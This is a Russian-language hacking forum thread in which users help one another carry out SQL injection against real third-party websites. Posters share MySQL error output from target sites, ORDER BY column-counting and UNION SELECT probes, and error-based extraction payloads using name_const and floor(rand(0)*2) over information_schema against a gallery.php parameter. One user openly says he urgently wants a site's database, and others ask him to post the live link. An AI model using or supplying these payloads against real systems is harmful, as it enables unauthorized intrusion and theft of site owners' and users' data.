Для кого человек это писал? https://forum.antichat.ru/thread104591.html плохо читал видать если ошибки Code: MySQL server version for the right syntax to use near '[B][COLOR=Red]\[/COLOR][/B]'db156426_4[B][COLOR=Red]\[/COLOR][/B]' --' Code: [B][COLOR=Red]Access denied[/COLOR][/B] for user 'db156426_4'@'127.0.0.2' to database 'mysql' тебе ни о чем не говорят,то я не знаю...
вот что выдает: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'abcd%' AND active = 'Y' ORDER BY 'ProductTitle' ASC LIMIT 0, 16' at line 1 зы другой сайт
GOGA075 почему невозможно? у меня было такое что невозможно было редактировать стиль установленный, но если редактировал шаблон другого стиля и потом устанавливал его как основной , то все канало...
Gorev В этом форуме нету ни редактора стилей ни функции "разрешать php..." Админ видно удалил данные модули!!
abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -- Если выведет 14, значит полей 13, и .т.п abcdsdjahsdjkhdjkhjkdhasdjkasdhjkh%' union select 1,2,3,4,5,6,7,8,9,10,11,12,13 -- ponel?
есть один сайт. На сайте search.php без параметров. В окошко вводим ' получаем: как я понял уязвим. Но... Куда подставлять параметры, если в адресной строке search.php неизменен. То есть вся работа скрипта скрыта. Можно ли как нибудь докопаться?
замучился уже с этим сайтом. Сижу уже за ним часов 12 ( Нашел наконец то ошибку, которую можно вызвать через GET запрос hxxp://site.com/gallery.php?file=1' получаем на странице, кроме прочего контента (img всякие там): Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/www/public_html/gallery.php on line 35 NetDevilZ SQL Scaner сказал, что это (Blind Injection), как я понял "слепая скуль". Но как же она слепая, если выдает ошибку? SQLI Helper 2.7 не смог ничего вытащить, показал лишь сервер и версию PHP Pangolin.Pro тоже не помог. Говорит Cannot detecte keyword! Где мне достать этот keyword я понятия не имею. Помогите, кто чем может. В какую сторону копать? Где почитать? Что мне вообще делать. База с сайта нужна, как никогда (кста установлен на Apache/2.0.52 (CentOS) PHP/5.1.6, то есть кроме как sql я наверное по другому к нему никак(( ) ЗЫ есть полная структура сайта, полученая intelli tamper, есть phpinfo файл, есть пару полей, что POST методом выдают ошибку.
hxxp://site.com/gallery.php?file=(select*from(select+name_const(version(),1),name_const(version(),1))a)
Я чесно сказать не понял, что ты хотел этим запросом добиться, но без изменени (что с параметром, что без) можно поподробней? Я вообще не представляю, с чего начать крутить ее.
hxxp://site.com/gallery.php?file=1+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a) лучше ссылку в студию если конечно сайт не в .ru зоне
Хочеться взять и ... Если ошибка есть, то может быть и слепая (О чудо, я открыл глаза на мир скулей? ). Ты бы лучше выложил ссылку. Ты вообще адекватный человек? Если ошибка PHP, ошибки Sql синтаксиса нету, причём здесь твой вывод через ошибку? Аналогично. // Будь тут Grey, он бы вам таких клизм вставил, что вы бы больше сюда незаходили 2pinch, ну раз непомешан, чего советовать тогда?